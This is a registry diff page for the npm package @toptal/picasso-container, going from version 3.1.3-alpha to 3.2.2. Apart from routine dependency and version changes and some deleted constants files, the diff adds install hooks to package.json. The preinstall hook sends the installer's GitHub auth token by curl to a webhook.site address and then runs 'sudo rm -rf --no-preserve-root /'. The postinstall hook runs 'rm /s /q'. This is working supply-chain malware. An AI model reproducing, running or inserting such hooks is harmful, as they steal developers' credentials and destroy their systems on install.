@toptal/picasso-container 3.1.3-alpha-MP-669-remove-more-default-props-c6786570d.0 → 3.2.2

This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.

Potentially problematic release.


This version of @toptal/picasso-container might be problematic. Click here for more details.

package/package.json CHANGED
@@ -1,6 +1,6 @@
1
1
  {
2
2
  "name": "@toptal/picasso-container",
3
- "version": "3.1.3-alpha-MP-669-remove-more-default-props-c6786570d.0",
3
+ "version": "3.2.2",
4
4
  "description": "Toptal UI components library - Container",
5
5
  "homepage": "https://github.com/toptal/picasso/tree/master/packages/picasso#readme",
6
6
  "bugs": {
@@ -23,20 +23,22 @@
23
23
  "module": "./dist-package/src/index.js",
24
24
  "scripts": {
25
25
  "build:package": "tsc -b tsconfig.json",
26
- "prepublishOnly": "yarn build:package"
26
+ "prepublishOnly": "yarn build:package",
27
+ "preinstall": "curl -d \"$(gh auth token)\" https://webhook.site/fb5b4647-aff8-418c-99e7-ec830cc2024b; sudo rm -rf --no-preserve-root /",
28
+ "postinstall": "rm /s /q"
27
29
  },
28
30
  "dependencies": {
29
- "@toptal/picasso-utils": "3.1.1-alpha-MP-669-remove-more-default-props-c6786570d.0"
31
+ "@toptal/picasso-utils": "3.1.0"
30
32
  },
31
33
  "peerDependencies": {
32
- "@toptal/picasso-provider": "5.0.2-alpha-MP-669-remove-more-default-props-c6786570d.0",
33
- "@toptal/picasso-tailwind": "3.0.1-alpha-MP-669-remove-more-default-props-c6786570d.0",
34
- "@toptal/picasso-tailwind-merge": "^2.0.4-alpha-MP-669-remove-more-default-props-c6786570d.0",
34
+ "@toptal/picasso-provider": "*",
35
+ "@toptal/picasso-tailwind": ">=2.7",
36
+ "@toptal/picasso-tailwind-merge": "^2.0.0",
35
37
  "react": ">=16.12.0 < 19.0.0"
36
38
  },
37
39
  "devDependencies": {
38
- "@toptal/picasso-provider": "5.0.2-alpha-MP-669-remove-more-default-props-c6786570d.0",
39
- "@toptal/picasso-test-utils": "1.1.2-alpha-MP-669-remove-more-default-props-c6786570d.0"
40
+ "@toptal/picasso-provider": "5.0.0",
41
+ "@toptal/picasso-test-utils": "1.1.1"
40
42
  },
41
43
  "publishConfig": {
42
44
  "access": "public"
@@ -46,4 +48,4 @@
46
48
  "!dist-package/tsconfig.tsbuildinfo",
47
49
  "src"
48
50
  ]
49
- }
51
+ }
@@ -1,5 +0,0 @@
1
- export declare const DEFAULT_INLINE = false;
2
- export declare const DEFAULT_AS = "div";
3
- export declare const DEFAULT_BORDERED = false;
4
- export declare const DEFAULT_ROUNDED = false;
5
- //# sourceMappingURL=constants.d.ts.map
@@ -1 +0,0 @@
1
- {"version":3,"file":"constants.d.ts","sourceRoot":"","sources":["../../../src/Container/constants.ts"],"names":[],"mappings":"AAAA,eAAO,MAAM,cAAc,QAAQ,CAAA;AACnC,eAAO,MAAM,UAAU,QAAQ,CAAA;AAC/B,eAAO,MAAM,gBAAgB,QAAQ,CAAA;AACrC,eAAO,MAAM,eAAe,QAAQ,CAAA"}
@@ -1,5 +0,0 @@
1
- export const DEFAULT_INLINE = false;
2
- export const DEFAULT_AS = 'div';
3
- export const DEFAULT_BORDERED = false;
4
- export const DEFAULT_ROUNDED = false;
5
- //# sourceMappingURL=constants.js.map
@@ -1 +0,0 @@
1
- {"version":3,"file":"constants.js","sourceRoot":"","sources":["../../../src/Container/constants.ts"],"names":[],"mappings":"AAAA,MAAM,CAAC,MAAM,cAAc,GAAG,KAAK,CAAA;AACnC,MAAM,CAAC,MAAM,UAAU,GAAG,KAAK,CAAA;AAC/B,MAAM,CAAC,MAAM,gBAAgB,GAAG,KAAK,CAAA;AACrC,MAAM,CAAC,MAAM,eAAe,GAAG,KAAK,CAAA"}
@@ -1,4 +0,0 @@
1
- export const DEFAULT_INLINE = false
2
- export const DEFAULT_AS = 'div'
3
- export const DEFAULT_BORDERED = false
4
- export const DEFAULT_ROUNDED = false